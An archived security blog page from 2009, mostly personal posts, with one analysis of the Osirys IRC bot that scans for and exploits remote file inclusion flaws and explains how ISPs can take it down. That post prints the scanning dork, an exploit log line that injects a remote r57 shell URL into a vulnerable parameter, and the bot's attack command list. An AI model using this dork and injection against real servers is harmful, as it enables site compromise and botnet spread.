Andrew Martin » Uncategorized

Webcast today

martinse — Wed, 24 Jun 2009 14:07:53 +0000

Just a quick reminder that the webcast for my paper “Mobile Device Forensics” will be taking place at 1pm EDT today. See my previous blog post for more information.

Controlling an RFI bot – RFI pt3

martinse — Thu, 04 Jun 2009 22:50:17 +0000

Lets delve a little deeper into the Osirys IRC bot which I initially discussed in part 1. First I will illustrate how the attacker finds and exploits web servers, then I will discuss how ISPs can get involved and remove these bots from their networks.

First the attacker issues a command to the bot to begin scanning. The scan will search for the dork “index.php?sayfa=” which will find hosts that are vulnerable to this attack.

<[attacker]> !rfi index.php?sayfa= “index.php?sayfa=” -p 75

The bot then searches several search engines to find sites that meet the attacker’s criteria and begins trying to exploit them.

[*] RFI Scan started -> 75 sites/process
[+] Bug: index.php?sayfa=
[+] Dork: “index.php?sayfa=”
[~] >ABACHO : 0 > “index.php?sayfa=”
[~] >WEB.DE : 0 > “index.php?sayfa=”
[~] >YAHOO : 0 > “index.php?sayfa=”
[~] >ASK : 126 > “index.php?sayfa=”
[~] >ALLTHEWEB : 3084 > “index.php?sayfa=”
[~] >UOL : 390 > “index.php?sayfa=”
[~] >MSN : 2997 > “index.php?sayfa=”
[~] >ALTAVISTA : 630 > “index.php?sayfa=”
[~] >WEB.DE : 0 > “index.php?sayfa=”
[~] >GOOGLE : 0 > “index.php?sayfa=”
[~] >MSN : 3057 > “index.php?sayfa=”
[~] >ASK : 363 > “index.php?sayfa=”
[~] >UOL : 225 > “index.php?sayfa=”
[~] >VIRGILIO : 0 > “index.php?sayfa=”
[~] >LYCOS : 1731 > “index.php?sayfa=”
[~] >ABACHO : 0 > “index.php?sayfa=”
[*] >EXPLOITABLES: 4561 “index.php?sayfa=”
[+] ExPLoItIng STARTED !!

A vulnerable host is found and the attacker is now able to control the host using their shell, which in this case is in r57.txt.

(safe: ON) (os: WINNT) http://[removed]/EN/index.php?sayfa=http://www.tos-belarus.org/data/r57.txt???
(uname -a) Windows NT HERA 5.0 build 2195
(hdd space) free: ( 4.92 Mb) used: ( 84.00 Kb) tot: ( 5.00 Mb)
[+] Trying to spread ..
[%] _/ Exploiting 100 / 4561
ISPs can use the following to interact with the bot and remove it from their network. This bot is running on my own IRC server for testing purposes.

Removal of the bot requires administrative credentials which are available in the script. Looking at the below configuration sample user “andy” may issue administrative commands to the bot.

my @admins = (“andy”);
my $killpwd = “adminpass”; #Password to Kill the Bot

Show bot commands

!help
[!] !response > Test if the RFI Response is working
[*] !chid > Change the RFI-Response
[*] !killme > KILL The Bot
[!] !milw0rm rss > Get the last Milw0rm bugs
[!] !new rfi bugs > Get the last 10 RFI bugs
[!] !new lfi bugs > Get the last 10 LFI bugs
[!] !new sql bugs > Get the last 10 SQL Injection bugs
[!] !new rce bugs > Get the last 10 RCE bugs
[!] !cari -p > Start the RFI Scanner
[!] !lfi > Start the LFI Scanner
[!] !sql -p > Start the SQL Injection Scanner
[!] !rce -p > Start the RCE Scanner
[!] !mass[rfi/lfi/sql/rce] -p > Start the Mass Scan
[*] !cmd > Gives command on the Bot’s shell. Ex: (!cmd id) (!cmd uname -a)
[*] !sspread -s > To spread on a vulnerable host. Ex: (!spread -s www.h.com/a.php?bug=)
[*] !admin add/remove > To add/remove a nickname to/from the admin list
[*] /msg RFI[13] !Sec ON/OFF -p > To enable or disable Security Mode
[*] /msg RFI[13] !Spread ON/OFF -p > To enable or disable Spread Mode
[!] !info > Get infos about the Bot

Gather information

!info
[i] Release : v6 -Private IrcBot
[i] Author : Attacker Nickname
[i] Contact : attacker@some.com
[i] Uname -a: Linux ubuntu 2.6.28-11-server #42-Ubuntu SMP Fri Apr 17 02:45:36 UTC 2009 x86_64 GNU/Linux
[i] Uptime : 15:11:59 up 6 days, 50 min, 2 users, load average: 0.05, 0.01, 0.00
[i] Spread Mode: OFF
[i] Security Mode: OFF

Remove the bot (admin only)

!cmd rm myscan2.txt (optional step if you know the name of the bot file)
!killme
[!] Bye Bye !
* RFI[13] has quit IRC (Client exited)

Remember that simply removing the bot does not address the underlying vulnerability on the system that allowed it to be compromised.

This script also contains valuable investigative information in these two variables:

$auth = “attacker nickname”;
$authmail = “attacker@some.com”;

Trip cut short by the Swine Flu

martinse — Wed, 29 Apr 2009 16:11:46 +0000

Well, looks like my 4 month odyssey is coming to an end about a week early due to the Swine Flu. I am currently in Cancun, Mexico and with all the news coming out about flights being canceled and public gathering places being closed, I’ve decided to take up the offer from my airline to change my flight home for free.

So far, Cancun does not have any reported cases of Swine Flu, the people here are not overly worried and for the most part things are normal. Last night however I got news that the Mexican government would be closing public places like Chichen Itza and other archaeological sites. Large bars, clubs, etc are also closed. I also watched a press conference held this morning in Mexico city where they said they are raising their alert level to the highest level possible in the hopes of stemming the flow of new cases. While they know the decision is not popular, they feel it is warranted. The heightened alert level is in effect until May 6th.

Considering Chichen Itza was my reason for coming here, there is now no reason for me to stay during this tense time. This will be an eventful end to a long journey!

Host Move Complete

martinse — Fri, 24 Apr 2009 22:02:52 +0000

The move of the blog to the new domain and web host is now complete. Now I’ll be able to admin every portion of the site and have much more control. I have also placed ads on the site in the hopes of covering some of my hosting costs.

The site’s page rank has suffered unfortunately since I had to move from wordpress.com. Being a free offering, wordpress.com doesn’t give you the ability to re-direct to a new domain and maintain the site’s reputation unfortunately.

I will also be blogging in both English and Spanish so please forgive spelling / grammatical errors in the Spanish version as I am still learning. Please feel free to report any glaring mistakes.

All content from the old blog (RealSecurity) is now hosted here so please update your bookmarks accordingly.

Only two weeks left until I return home from traveling South and Central America and the entries will start flowing again!

Moving Hosts

martinse — Thu, 16 Apr 2009 19:33:24 +0000

I have decided to change my webhosts in order to provide a better experience to my readers and to re-brand the blog under my own name. I started this blog with a wordpress.com account as a trial and I’ve been very pleasantly surprised by the feedback and interest the blog has received. So to get more flexibility I’ve moved to a proper webhost. The blog will be in a bit of a state of flux as I transition from http://realsecurity.wordpress.com to here.

Stay tuned.

Social Security Awards

martinse — Sat, 14 Mar 2009 11:43:12 +0000

Traveling has been keeping me pretty out of the loop, but I happened to stumble on the Social Security Awards contest where the winner will be announced at the RSA conference this year. Needless to say, I would appreciate your votes in the Best Technical Security Blog area.

Vote here: http://www.socialsecurityawards.com/

I shall resume regular updates in May upon my return!

Taking some time off

martinse — Wed, 07 Jan 2009 20:05:47 +0000

Since we normally only live once, I’ve decided to take an extended vacation. Thankfully my employer has been kind enough to let me take a 4 month leave of absence. I’ll be using the time to learn Spanish in Buenos Aires and then continue traveling through South and Central America.

Maybe I’ll post some photos along the way to make all my readers jealous

Happy hunting,

RealSecurity

Job ads in HTTP headers?!

martinse — Thu, 04 Sep 2008 03:34:02 +0000

Seems I was running wireshark in the background while writing the past post. Looks like the WordPress folks are recruiting!

My post:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: realsecurity.wordpress.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.1) Gecko/2008070208 Firefox/3.0.1
Accept: */*

The reply:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 04 Sep 2008 01:53:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-hacker: If you’re reading this, you should visit automattic.com/jobs and apply to join the fun, mention this header.
Content-Encoding: gzip
Vary: Accept-Encoding

Content-Length: 22